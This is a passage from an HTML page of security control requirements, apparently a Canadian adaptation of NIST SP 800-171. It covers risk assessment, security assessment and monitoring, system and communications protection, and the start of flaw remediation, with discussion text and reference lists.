Safeguarding measures used to control physical access to system distribution and transmission lines include disconnected or locked spare jacks, locked wiring closets, protecting cabling with conduit or cable trays, and wiretapping sensors.</p> <h5>References</h5> <p>Source control: PE-04<br /> Supporting publications: None</p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-11">3.11 Risk assessment</h3> <p>The Risk assessment controls deal with the periodic conduct of risk assessments, including privacy impact assessments, resulting from the operation of organizational systems and associated handling, storage, or transmission of data and information.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-11-01">03.11.01 Risk assessment</a></li> <li><a href="#03-11-02">03.11.02 Vulnerability monitoring and scanning</a></li> <li><a href="#03-11-03">03.11.03 Not allocated</a></li> <li><a href="#03-11-04">03.11.04 Risk response</a></li> </ul> </section>–> <details><summary><h4 id="03-11-01">03.11.01 Risk assessment</h4> </summary><ol class="lst-upr-alph"><li>Assess the risk (including supply chain risk) of unauthorized disclosure resulting from the handling, processing, storage, or transmission of specified information</li> <li>Update risk assessments [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>Establishing the system boundary is a prerequisite to assessing the risk of unauthorized disclosure of specified information. Risk assessments consider threats, vulnerabilities, likelihood, and adverse impacts to organizational operations and assets based on the operation and use of the system and the unauthorized disclosure of specified information. Risk assessments also consider risks from external parties (e.g., contractors operating systems on behalf of the organization, service providers, individuals accessing systems, and outsourcing entities). Risk assessments can be conducted at the organization level, the mission or business process level, or the system level and at any phase in the system development life cycle. Risk assessments include supply chain-related risks associated with suppliers or contractors and the system, system component, or system service that they provide.</p> <h5>References</h5> <p>Source controls: RA-03, RA-03(01), SR-06<br /> Supporting publications:</p> <ul><li><a href="/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li><a href="/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber Centre Cyber supply chain: An approach to assessing risk (ITSAP.10.070)</a></li> <li><a href="/en/guidance/supply-chain-security-small-and-medium-sized-organizations-itsap00070">Cyber Centre Supply chain security for small and medium-sized organizations (ITSAP.00.070)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/30/r1/final">NIST SP 800-30 Guide for Conducting Risk Assessments</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></li> </ul></details><details><summary><h4 id="03-11-02">03.11.02 Vulnerability monitoring and scanning</h4> </summary><ol class="lst-upr-alph"><li>Monitor and scan for vulnerabilities in the system [Assignment: organization-defined frequency] and when new vulnerabilities affecting the system are identified</li> <li>Remediate system vulnerabilities within [Assignment: organization-defined response times]</li> <li>Update system vulnerabilities to be scanned [Assignment: organization-defined frequency] and when new vulnerabilities are identified and reported</li> </ol><h5>Discussion</h5> <p>Organizations determine the required vulnerability scanning for system components and ensure that potential sources of vulnerabilities (e.g., networked printers, scanners, and copiers) are not overlooked. Vulnerability analyses for custom software may require additional approaches, such as static analysis, dynamic analysis, or binary analysis. Organizations can use these approaches in source code reviews and tools (e.g., static analysis tools, web-based application scanners, binary analyzers). Vulnerability scanning includes scanning for patch levels; scanning for functions, ports, protocols, and services that should not be accessible to users or devices; and scanning for improperly configured or incorrectly operating flow control mechanisms.</p> <p>To facilitate interoperability, organizations consider using scanning tools that express vulnerabilities in the Common Vulnerabilities and Exposures (CVE) naming convention. Sources for vulnerability information also include the Common Weakness Enumeration (CWE) listing, the National Vulnerability Database (NVD), and the Common Vulnerability Scoring System (CVSS).</p> <h5>References</h5> <p>Source controls: RA-05, RA-05(02)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/40/r4/final">NIST SP 800-40 Guide to Enterprise Patch Management Planning: Preventive Maintenance for Technology</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/53/a/r5/final">NIST SP 800-53A Assessing Security and Privacy Controls in Information Systems and Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/70/r4/final">NIST SP 800-70 National Checklist Program for <abbr title="information technology">IT</abbr> Products: Guidelines for Checklist Users and Developers</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/115/final">NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/126/r3/final">NIST SP 800-126 The Technical Specification for the Security Content Automation Protocol (SCAP): SCAP Version 1.3</a></li> <li><a href="/en/guidance/top-10-it-security-action-items-no2-patch-operating-systems-and-applications-itsm10096">Cyber Centre Top 10 <abbr title="information technology">IT</abbr> security actions: No.2 patch operating systems and applications (ITSM.10.096)</a></li> </ul></details><h4 id="03-11-03">03.11.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-11-04">03.11.04 Risk response</h4> </summary><p>Respond to findings from security assessments, monitoring, and audits.</p> <h5>Discussion</h5> <p>This requirement addresses the need to determine an appropriate response to risk before generating a plan of action and milestones (POAM) entry. It may be possible to mitigate the risk immediately so that a <abbr title="plan of action and milestones">POAM</abbr> entry is not needed. However, a <abbr title="plan of action and milestones">POAM</abbr> entry is generated if the risk response is to mitigate the identified risk and the mitigation cannot be completed immediately.</p> <h5>References</h5> <p>Source control: RA-07<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems </a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-12">3.12 Security assessment and monitoring</h3> <p>The Security assessment and monitoring controls deal with the security assessment and monitoring of the system.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-12-01">03.12.01 Security assessment</a></li> <li><a href="#03-12-02">03.12.02 Plan of action and milestones</a></li> <li><a href="#03-12-03">03.12.03 Continuous monitoring</a></li> <li><a href="#03-12-04">03.12.04 Not allocated</a></li> <li><a href="#03-12-05">03.12.05 Information exchange</a></li> </ul> </section>–> <details><summary><h4 id="03-12-01">03.12.01 Security assessment</h4> </summary><p>Assess the security and privacy requirements for the system and its environment of operation [Assignment: organization-defined frequency] to determine if the requirements have been satisfied.</p> <h5>Discussion</h5> <p>By assessing the security and privacy requirements, organizations determine whether the necessary safeguards and countermeasures are implemented correctly, operating as intended, and producing the desired outcome. Security assessments identify weaknesses and deficiencies in the system and provide the essential information needed to make risk-based decisions. Security and privacy assessment reports document assessment results in sufficient detail as deemed necessary by the organization to determine the accuracy and completeness of the reports. Security assessment results are provided to the individuals or roles appropriate for the types of assessments being conducted.</p> <h5>References</h5> <p>Source control: CA-02<br /> Supporting publications:</p> <ul><li>Cyber Centre Security and privacy controls and assurance activities catalogue (ITSP.10.033)</li> <li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> <li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/115/final">NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/53/a/r5/final">NIST SP 800-53A Assessing Security and Privacy Controls in Information Systems and Organizations</a></li> </ul></details><details><summary><h4 id="03-12-02">03.12.02 Plan of action and milestones</h4> </summary><ol class="lst-upr-alph"><li>Develop a plan of action and milestones (POAMs) for the system to: <ol><li>document the planned remediation actions to correct weaknesses or deficiencies noted during security assessments</li> <li>reduce or eliminate known system vulnerabilities</li> </ol></li> <li>Update the existing <abbr title="plan of action and milestones">POAM</abbr>s based on the findings from: <ol><li>security assessments</li> <li>audits or reviews</li> <li>continuous monitoring activities</li> </ol></li> </ol><h5>Discussion</h5> <p><abbr title="plan of action and milestones">POAM</abbr>s are important documents in organizational security and privacy programs. Organizations use <abbr title="plan of action and milestones">POAM</abbr>s to describe how unsatisfied security requirements will be met and how planned mitigations will be implemented. Organizations can document system security plans and <abbr title="plan of action and milestones">POAM</abbr>s as separate or combined documents and in any format.</p> <h5>References</h5> <p>Source control: CA-05<br /> Supporting publications: Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</p> </details><details><summary><h4 id="03-12-03">03.12.03 Continuous monitoring</h4> </summary><p>Develop and implement a system-level continuous monitoring strategy that includes ongoing monitoring and security assessments.</p> <h5>Discussion</h5> <p>Continuous monitoring at the system level facilitates ongoing awareness of the system security and privacy posture to support risk management decisions. The terms "continuous" and "ongoing" imply that organizations assess and monitor their systems at a frequency that is sufficient to support risk-based decisions. Different types of security and privacy requirements may require different monitoring frequencies.</p> <h5>References</h5> <p>Source control: CA-07<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/115/final">NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/137/final">NIST SP 800-137 Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/53/a/r5/final">NIST SP 800-53A Assessing Security and Privacy Controls in Information Systems and Organizations</a></li> </ul></details><h4 id="03-12-04">03.12.04 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-12-05">03.12.05 Information exchange</h4> </summary><ol class="lst-upr-alph"><li>Approve and manage the exchange of specified information between the system and other systems using [Selection (one or more): interconnection security agreements; information exchange security agreements; memoranda of understanding or agreement; information sharing arrangements; service level agreements; user agreements; nondisclosure agreements]</li> <li>Document, as part of the exchange agreements, interface characteristics, security and privacy requirements, and responsibilities for each system</li> <li>Review and update the exchange agreements [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>Information exchange applies to information exchanges between two or more systems, both internal and external to the organization. Organizations consider the risks related to new or increased threats that may be introduced when systems exchange information with other systems that may have different security requirements or policies. The types of agreements selected are based on factors such as the relationship between the organizations exchanging information (e.g., government to government, government to business, business to business, government or business to service provider, government or business to individual) and the level of access to the organizational system by users of the other system. The types of agreements can include information exchange security agreements, interconnection security agreements, memoranda of understanding or agreement, information sharing arrangements, service-level agreements, or other types of agreements.</p> <p>Organizations may incorporate agreement information into formal contracts, especially for information exchanges established between federal departments and agencies and non-federal organizations (e.g., service providers, contractors, system developers, and system integrators). The types of information contained in exchange agreements include the interface characteristics, security and privacy requirements, controls, and responsibilities for each system.</p> <h5>References</h5> <p>Source control: CA-03<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022) </a></li> <li><a href="/en/guidance/network-security-zoning-design-considerations-placement-services-within-zones-itsg-38">Cyber Centre Network security zoning – Design considerations for placement of services within zones (ITSG-38) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/47/r1/final">NIST SP 800-47 Managing the Security of Information Exchanges </a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-13">3.13 System and communications protection</h3> <p>The System and communications protection controls support the monitoring, control and protection of the systems themselves and of the communications between and within the systems.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-13-01">03.13.01 Boundary protection</a></li> <li><a href="#03-13-02">03.13.02 Not allocated</a></li> <li><a href="#03-13-03">03.13.03 Not allocated</a></li> <li><a href="#03-13-04">03.13.04 Information in shared system resources</a></li> <li><a href="#03-13-05">03.13.05 Not allocated</a></li> <li><a href="#03-13-06">03.13.06 Network communications&nbsp;– deny by default&nbsp;– allow by exception</a></li> <li><a href="#03-13-07">03.13.07 Not allocated</a></li> <li><a href="#03-13-08">03.13.08 Transmission and storage confidentiality</a></li> <li><a href="#03-13-09">03.13.09 Network disconnect</a></li> <li><a href="#03-13-10">03.13.10 Cryptographic key establishment and management</a></li> <li><a href="#03-13-11">03.13.11 Cryptographic protection</a></li> <li><a href="#03-13-12">03.13.12 Collaborative computing devices and applications</a></li> <li><a href="#03-13-13">03.13.13 Mobile code</a></li> <li><a href="#03-13-14">03.13.14 Not allocated</a></li> <li><a href="#03-13-15">03.13.15 Session authenticity</a></li> <li><a href="#03-13-16">03.13.16 Not allocated</a></li> </ul> </section>–> <details><summary><h4 id="03-13-01">03.13.01 Boundary protection</h4> </summary><ol class="lst-upr-alph"><li>Monitor and control communications at the external managed interfaces to the system and key internal managed interfaces within the system</li> <li>Implement subnetworks for publicly accessible system components that are physically or logically separated from internal networks</li> <li>Connect to external systems only through managed interfaces consisting of boundary protection devices arranged in accordance with an organizational security architecture</li> </ol><h5>Discussion</h5> <p>Managed interfaces include gateways, routers, firewalls, network-based malicious code analysis, virtualization systems, and encrypted tunnels implemented within a security architecture. Subnetworks that are either physically or logically separated from internal networks are referred to as demilitarized zones or DMZs. Restricting or prohibiting interfaces within organizational systems includes restricting external web traffic to designated web servers within managed interfaces, prohibiting both internal and external address spoofing for protocols crossing the boundary.</p> <h5>References</h5> <p>Source control: SC-07<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/network-security-zoning-design-considerations-placement-services-within-zones-itsg-38">Cyber Centre Network security zoning – Design considerations for placement of services within zones (ITSG-38)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/189/final">NIST SP 800-189 Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/41/r1/final">NIST SP 800-41 Guidelines on Firewalls and Firewall Policy</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/125/b/final">NIST SP 800-125B Secure Virtual Network Configuration for Virtual Machine (VM) Protection</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/207/final">NIST SP 800-207 Zero Trust Architecture</a></li> </ul></details><h4 id="03-13-02">03.13.02 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-13-03">03.13.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-04">03.13.04 Information in shared system resources</h4> </summary><p>Prevent unauthorized and unintended information transfer via shared system resources.</p> <h5>Discussion</h5> <p>Preventing unauthorized and unintended information transfer via shared system resources stops information produced by the actions of prior users or roles (or actions of processes acting on behalf of prior users or roles) from being available to current users or roles (or current processes acting on behalf of current users or roles) that obtain access to shared system resources after those resources have been released back to the system. Information in shared system resources also applies to encrypted representations of information. In other contexts, the control of information in shared system resources is referred to as object reuse and residual information protection. Information in shared system resources does not address information remanence, which refers to the residual representation of data that has been nominally deleted, covert channels (including storage and timing channels) in which shared system resources are manipulated to violate information flow restrictions, or components within systems for which there are only single users or roles.</p> <h5>References</h5> <p>Source control: SC-04<br /> Supporting publications: None</p> </details><h4 id="03-13-05">03.13.05 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-06">03.13.06 Network communications – deny by default – allow by exception</h4> </summary><p>Deny network communications traffic by default and allow network communications traffic by exception.</p> <h5>Discussion</h5> <p>This requirement applies to inbound and outbound network communications traffic at the system boundary and at identified points within the system. A deny-all, allow-by-exception network communications traffic policy ensures that only essential and approved connections are allowed.</p> <h5>References</h5> <p>Source control: SC-07(05)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/41/r1/final">NIST SP 800-41 Guidelines on Firewalls and Firewall Policy</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/189/final">NIST SP 800-189 Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation</a></li> </ul></details><h4 id="03-13-07">03.13.07 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-08">03.13.08 Transmission and storage confidentiality</h4> </summary><p>Implement cryptographic mechanisms to prevent the unauthorized disclosure of specified information during transmission and while in storage.</p> <h5>Discussion</h5> <p>This requirement applies to internal and external networks and any system components that can transmit specified information, including servers, notebook computers, desktop computers, mobile devices, printers, copiers, scanners, facsimile machines, and radios. Unprotected communication paths are susceptible to interception and modification. Encryption protects specified information from unauthorized disclosure during transmission and while in storage. Cryptographic mechanisms that protect the confidentiality of specified information during transmission include <abbr title="Transport Layer Security">TLS</abbr> and IPsec. Information in storage (i.e., information at rest) refers to the state of specified information when it is not in process or in transit and resides on internal or external storage devices, storage area network devices, and databases. Protecting specified information in storage does not focus on the type of storage device or the frequency of access to that device but rather on the state of the information. This requirement relates to <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source controls: SC-08, SC-08(01), SC-28, SC-28(01)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cyber Centre Cryptographic Algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B Information (ITSP.40.111)</a></li> <li><a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules</a></li> <li><a href="https://csrc.nist.gov/pubs/fips/197/final">NIST FIPS 197 Advanced Encryption Standard</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/52/r2/final">NIST SP 800-52 Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/a/r3/final">NIST SP 800-56A Recommendation for Pair-Wise Key-Establishment Schemes Using Discrete Logarithm Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/b/r2/final">NIST SP 800-56B Recommendation for Pair-Wise Key-Establishment Schemes Using Integer Factorization Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/c/r2/final">NIST SP 800-56C Recommendation for Key-Derivation Methods in Key-Establishment Schemes</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt1/r5/final">NIST SP 800-57-1 Recommendation for Key Management: Part 1 – General</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt2/r1/final">NIST SP 800-57-2 Recommendation for Key Management: Part 2 – Best Practices for Key Management Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt3/r1/final">NIST SP 800-57-3 Recommendation for Key Management, Part 3: Application-Specific Key Management Guidance</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/113/final">NIST SP 800-113 Guide to SSL <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security</a></li> <li><a href="/en/guidance/end-user-device-security-bring-your-own-device-byod-deployment-models-itsm70003">Cyber Centre End user device security for Bring-Your-Own-Device (BYOD) deployment models (ITSM.70.003)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/121/r2/upd1/final">NIST SP 800-121 Guide to Bluetooth Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/177/r1/final">NIST SP 800-177 Trustworthy Email</a></li> </ul></details><details><summary><h4 id="03-13-09">03.13.09 Network disconnect</h4> </summary><p>Terminate network connections associated with communications sessions at the end of the sessions or after [Assignment: organization-defined time period] of inactivity.</p> <h5>Discussion</h5> <p>This requirement applies to internal and external networks. Terminating network connections associated with communications sessions includes deallocating <abbr title="Transmission Control Protocol/Internet Protocol">TCP/IP</abbr> addresses or port pairs at the operating system level or deallocating networking assignments at the application level if multiple application sessions are using a single network connection. Time periods of inactivity may be established by organizations and include time periods by type of network access or for specific network accesses.</p> <h5>References</h5> <p>Source control: SC-10<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-13-10">03.13.10 Cryptographic key establishment and management</h4> </summary><p>Establish and manage cryptographic keys in the system in accordance with the following key management requirements: [Assignment: organization-defined requirements for key generation, distribution, storage, access, and destruction].</p> <h5>Discussion</h5> <p>Cryptographic keys can be established and managed using either manual procedures or automated mechanisms supported by manual procedures. Organizations satisfy key establishment and management requirements in accordance with applicable federal laws, Orders in Council, policies, directives, regulations, and standards that specify appropriate options, levels, and parameters. This requirement is related to <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source control: SC-12<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/a/r3/final">NIST SP 800-56A Recommendation for Pair-Wise Key-Establishment Schemes Using Discrete Logarithm Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/b/r2/final">NIST SP 800-56B Recommendation for Pair-Wise Key-Establishment Schemes Using Integer Factorization Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/c/r2/final">NIST SP 800-56C Recommendation for Key-Derivation Methods in Key-Establishment Schemes</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt1/r5/final">NIST SP 800-57-1 Recommendation for Key Management: Part 1 – General</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt2/r1/final">NIST SP 800-57-2 Recommendation for Key Management: Part 2 – Best Practices for Key Management Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt3/r1/final">NIST SP 800-57-3 Recommendation for Key Management, Part 3: Application-Specific Key Management Guidance</a></li> </ul></details><details><summary><h4 id="03-13-11">03.13.11 Cryptographic protection</h4> </summary><p>Implement the following types of cryptography when used to protect the confidentiality of specified information: [Assignment: organization-defined types of cryptography].</p> <h5>Discussion</h5> <p>Cryptography is implemented in accordance with applicable laws, Orders in Council, directives, regulations, policies, standards, and guidelines. Federal information processing standard (FIPS)-validated cryptography is recommended for the protection of specified information.</p> <h5>References</h5> <p>Source control: SC-13<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules</a></p> </details><details><summary><h4 id="03-13-12">03.13.12 Collaborative computing devices and applications</h4> </summary><ol class="lst-upr-alph"><li>Prohibit remote activation of collaborative computing devices and applications with the following exceptions: [Assignment: organization-defined exceptions where remote activation is to be allowed]</li> <li>Provide an explicit indication of use to users physically present at the devices</li> </ol><h5>Discussion</h5> <p>Collaborative computing devices include white boards, microphones, and cameras. Notebook computers, smartphones, display monitors, and tablets containing cameras and microphones are considered part of collaborative computing devices when conferencing software is in use. Indication of use includes notifying users (e.g., a pop-up menu stating that recording is in progress, or that the microphone has been turned on) when collaborative computing devices are activated. Dedicated video conferencing systems, which typically rely on one of the participants calling or connecting to the other party to activate the video conference, are excluded. Solutions to prevent device usage include webcam covers and buttons to disable microphones.</p> <h5>References</h5> <p>Source control: SC-15<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-13-13">03.13.13 Mobile code</h4> </summary><ol class="lst-upr-alph"><li>Define acceptable mobile code and mobile code technologies</li> <li>Authorize, monitor, and control the use of mobile code</li> </ol><h5>Discussion</h5> <p>Mobile code includes software programs or parts of programs that are obtained from remote systems, transmitted across a network, and executed on a local system without explicit installation or execution by the recipient. Decisions regarding the use of mobile code are based on the potential for the code to cause damage to the system if used maliciously. Mobile code technologies include Java applets, JavaScript, HTML5, VBScript, and WebGL. Usage restrictions and implementation guidelines apply to the selection and use of mobile code installed on servers and mobile code downloaded and executed on individual workstations and devices, including notebook computers, smart phones, and smart devices. Mobile code policies and procedures address the actions taken to prevent the development, acquisition, and use of unacceptable mobile code within the system, including requiring mobile code to be digitally signed by a trusted source.</p> <h5>References</h5> <p>Source control: SC-18<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/28/ver2/final">NIST SP 800-28 Guidelines on Active Content and Mobile Code</a></p> </details><h4 id="03-13-14">03.13.14 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-15">03.13.15 Session authenticity</h4> </summary><p>Protect the authenticity of communications sessions.</p> <h5>Discussion</h5> <p>Protecting session authenticity addresses communications protection at the session level, not at the packet level. Such protection establishes grounds for confidence at both ends of the communications sessions in the ongoing identities of other parties and the validity of the transmitted information. Authenticity protection includes protecting against adversary-in-the-middle attacks, session hijacking, and the insertion of false information into sessions.</p> <h5>References</h5> <p>Source control: SC-23<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/52/r2/final">NIST SP 800-52 Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/95/final">NIST SP 800-95 Guide to Secure Web Services</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/113/final">NIST SP 800-113 Guide to SSL <abbr title="virtual private network">VPN</abbr>s</a></li> </ul><h4 id="03-13-16">03.13.16 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-14">3.14 System and information integrity</h3> <p>The System and information integrity controls support the protection of the integrity of the system components and the data that it processes. They allow an organization to identify, report and correct data and system flaws in a timely manner, to provide protection against malicious code, and to monitor system security alerts and advisories, and to take appropriate actions in response.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-14-01">03.14.01 Flaw remediation</a></li> <li><a href="#03-14-02">03.14.02 Malicious code protection</a></li> <li><a href="#03-14-03">03.14.03 Security alerts, advisories, and directives</a></li> <li><a href="#03-14-04">03.14.04 Not allocated</a></li> <li><a href="#03-14-05">03.14.05 Not allocated</a></li> <li><a href="#03-14-06">03.14.06 System monitoring</a></li> <li><a href="#03-14-07">03.14.07 Not allocated</a></li> <li><a href="#03-14-08">03.14.08 Information management and retention</a></li> <li><a href="#03-14-09">03.14.09 Dedicated administration workstation</a></li> </ul> </section>–> <details><summary><h4 id="03-14-01">03.14.01 Flaw remediation</h4> </summary><ol class="lst-upr-alph"><li>Identify, report, and correct system flaws</li> <li>Install security-relevant software and firmware updates within [Assignment: organization-defined time period] of the release of the updates</li> </ol><h5>Discussion</h5> <p>Organizations identify systems that are affected by announced software and firmware flaws, including potential vulnerabilities that result from those flaws, and report this information to designated personnel with information security and privacy responsibilities. Security-relevant updates include patches, service packs, hot fixes, and anti-virus signatures. Organizations address the flaws discovered during security assessments, continuous monitoring, incident response activities, 